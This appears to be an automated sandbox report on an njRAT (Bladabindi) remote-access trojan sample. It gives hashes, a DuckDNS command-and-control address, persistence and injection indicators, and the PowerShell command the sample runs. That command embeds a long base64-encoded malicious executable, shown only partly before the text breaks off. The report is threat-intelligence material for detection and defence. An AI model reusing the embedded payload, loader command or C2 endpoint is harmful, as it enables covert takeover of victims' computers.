njrat | f4eb6874def6fb59224dac5a6b164d297540d40f1b52f6d33ebf654320865ab3

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
06-06-2023 09:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

pum.vbs
Size

584KB
MD5

850c00a9a4f884920bf998e784deb5ff
SHA1

dbc0cbdee0323392f7e1e40bdc2af681cdb7730b
SHA256

f4eb6874def6fb59224dac5a6b164d297540d40f1b52f6d33ebf654320865ab3
SHA512

ee8b0996e991ecbe344e74a41232306866506f1d4e7f5bf4d9d712a285bebc782c33dd1226c4d5c3d1c9e7cc12ef511953d694633fdba7d4aa17ea8b2e1566af
SSDEEP

3072:TpG1wfkYFEhNe4VTdRnTT8w4TWQNDJ4alTvPfkTk5G7ZqsmgYcp++og0S7wQzS1y:IwfkYF18ZqK

Score

10^/10

njrat nyan cat trojan

Malware Config

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

njnjnjs.duckdns.org:35888

Mutex

6515f0beea

Attributes

reg_key
6515f0beea
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	5096	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4f87072-7d06-4e8d-a6db-0a7854e5095e_c7c4ad21e5494deca8aad722dc87fa9d.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5096 set thread context of 2788	5096	powershell.exe	88

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
5096	powershell.exe
5096	powershell.exe
2856	powershell.exe
2856	powershell.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	5096	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe
Token: 33	2788	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2788	RegSvcs.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2300 wrote to memory of 5096	2300	WScript.exe	84
PID 2300 wrote to memory of 5096	2300	WScript.exe	84
PID 5096 wrote to memory of 2856	5096	powershell.exe	86
PID 5096 wrote to memory of 2856	5096	powershell.exe	86
PID 5096 wrote to memory of 2788	5096	powershell.exe	88
PID 5096 wrote to memory of 2788	5096	powershell.exe	88
PID 5096 wrote to memory of 2788	5096	powershell.exe	88
PID 5096 wrote to memory of 2788	5096	powershell.exe	88
PID 5096 wrote to memory of 2788	5096	powershell.exe	88
PID 5096 wrote to memory of 2788	5096	powershell.exe	88
PID 5096 wrote to memory of 2788	5096	powershell.exe	88
PID 5096 wrote to memory of 2788	5096	powershell.exe	88

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\pum.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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Pr3///8gBgAAAChzAAAGOr8AAAA4ugAAAAcICZoobwAABhMEIAMAAAAWOaQAAAAmHo0JAAABJRZymgQAcKIlF3K2BABwoiUYcuQEAHCiJRly+gQAcKIlGnIOBQBwoiUbch4FAHCiJRxyNgUAcKIlHXJMBQBwogwgCAAAADhSAAAAOKQAAAARBRfWEwUgAgAAAChyAAAGOjgAAAAmFgogDQAAADgrAAAAEQRzWgAACihwAAAGIAwAAAA4FQAAABcTBTj8/v//IAkAAAD+DgYA/gwGAEUOAAAACgAAAHH////t/v//mP///6b+//+y/v//jP///8X+///V/v//CgAAAAn///8g////rv///xoAAAAgBQAAADi5////cmQFAHALIAsAAAA4qf///wYqGzALALoGAAAGAAARKwImFiAGAAAAOBoGAAADKHcAAAY6tgQAACAuAAAAOMABAAARFBfaF9aNNwAAARMWIA4AAAAocgAABjqkAQAAJnNbAAAKehEOHyjWEw4gAgAAADiMAQAAEQR7CQAABBEJKGgAAAY57AIAACAfAAAAOG8BAAAoegAABhpAWwMAACAcAAAAKHIAAAY6VQEAACYIcsAFAHADKHgAAAYMIBcAAAAocwAABjo4AQAAODMBAAAWExIgGgAAADgmAQAAc1sAAAp6EQR7CQAABBENBBELEgEoZwAABjrsAAAAICEAAAA4/gAAAHNbAAAKehEEewoAAAQoagAABhVAwAQAACAvAAAAONwAAAARBHsJAAAEFhEKIAAwAAAfQChpAAAGEw0XKHMAAAY68QEAACYgBwAAADiuAAAAEQcWIAIAAQCeICcAAAAocgAABjqWAAAAJgU6kQEAACAQAAAAOIUAAAARDDkEAwAAIBYAAAAXOnMAAAAmBBEFH1TWKHkAAAYTCyAFAAAAFzpaAAAAJhEEewkAAAQRCB7WEgkaEgEoZgAABjqZAgAAICQAAAAWOTQAAAAmEQ06LgEAACAJAAAAOCIAAABzWwAACnoRBSD4AAAA1hMOOHMDAAAgLgAAAP4OGAD+DBgARTAAAABtAgAAWwAAAPIBAAChAgAAmP3//xoAAADBAQAAPQAAABX+//9OAAAAxQAAAFMCAADJ/v//X/7//xMBAAAsAQAACP///wj+//9PAQAAlwAAAD0AAACKAgAADAAAACcCAAC2/v//ZwEAANwCAACqAQAAuQIAAK/9//+EAAAAqAAAANwAAAAZ////pv7//+8AAACPAQAA1wEAAG4AAADM/f//jf7//z3+//8CAgAA4v7//3v9///4AgAA5/3//w8DAAAgAwAAABY5MP///yYRBhMNIAYAAAA4If///xEEewkAAAQRBhEKIAAwAAAfQChpAAAGEw0gIgAAADj+/v//EQ061/3//yAIAAAAOO3+//8XEwwgDQAAADjg/v//c1sAAAp6BBEFHyjWKHkAAAYTEDhD/v//JiAYAAAAKHIAAAY6uP7//yYREhERPlQCAAAgIAAAADik/v//ERQ5AP3//yAsAAAAOJP+//9zWwAACnoEEQUfUNYoeQAABhMKIAwAAAA4dv7//wQRBR801ih5AAAGEwYgEgAAADhf/v//EQ0ofQAABhMPICMAAAA4TP7//xEEewkAAAQRCB7WEQ8aEgEoZwAABjpY////IAEAAAA4KP7//wQRFREWFhEWjmkofAAABiAZAAAAOA/+//9zWwAACnoRBHsKAAAEEQcoYwAABjq5AQAAIC0AAAA47P3//yCzAAAAjQMAAAETByAoAAAAFzrV/f//JhEEewkAAAQRDRET1hEWERaOaRIBKGcAAAY6Gfz//yAEAAAAOKz9//9zWwAACnoRBhEJQBD///8gHQAAABc6kv3//yYEEQ4fENYoeQAABhMUIBUAAAA4ev3//xEHHywRDREQ1p4gJQAAABY5Zf3//yYoegAABhpAJgAAACAAAAAAKHIAAAY6Sv3//yYREhfWExIgHgAAADg5/f//c1sAAAp6EQR7CgAABBEHKGUAAAY6KPz//yApAAAAFjkV/f//JgIIflwAAAp+XAAAChYaflwAAAoUEgMSBChhAAAGOhAAAAAgCwAAADjo/P//c1sAAAp6BB88KHkAAAYTBSAKAAAAOM78//8RBHsKAAAEEQcoZAAABjrD+///ICoAAAA4sfz//wQRDh8U1ih5AAAGExUgEwAAADia/P//BBEFHNYoewAABhfaExEgEQAAADiC/P//EQR7CgAABBEHKGIAAAY6MgAAACAPAAAAKHIAAAY6YPz//yY4o/3//wQRDh8M1ih5AAAGExMgGwAAADhD/P//c1sAAAp6EQcfKZQTCCArAAAAOCz8//9zWwAACnrdLgAAACh+AAAGEQR7CwAABIQo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